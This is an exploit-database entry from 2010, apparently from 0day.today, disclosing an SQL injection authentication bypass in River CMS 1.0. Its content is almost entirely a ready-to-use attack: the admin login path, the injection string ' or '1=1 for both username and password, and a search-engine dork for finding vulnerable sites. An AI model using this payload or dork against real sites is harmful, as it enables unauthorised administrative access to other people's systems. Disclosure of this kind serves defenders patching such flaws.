id: 11242
date: 03/10/2010
title: River CMS version 1.0 SQL Injection / Authentication Bypass Vulnerability
author: Pouya Daneshmand
cves: 

=========================================================================
River CMS version 1.0 SQL Injection / Authentication Bypass Vulnerability
=========================================================================

#################################################################
# Application Info:
# Name: River CMS
# Version: 1.0
# Vendor: http://rivercms.ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
# Dork: "Powered By River CMS"
#################################################################
Vulnerability:
http://site.ir/admin/
Username: ' or '1=1
Password:?' or '1=1
#################################################################




#  0day.today [2023-03-26]  #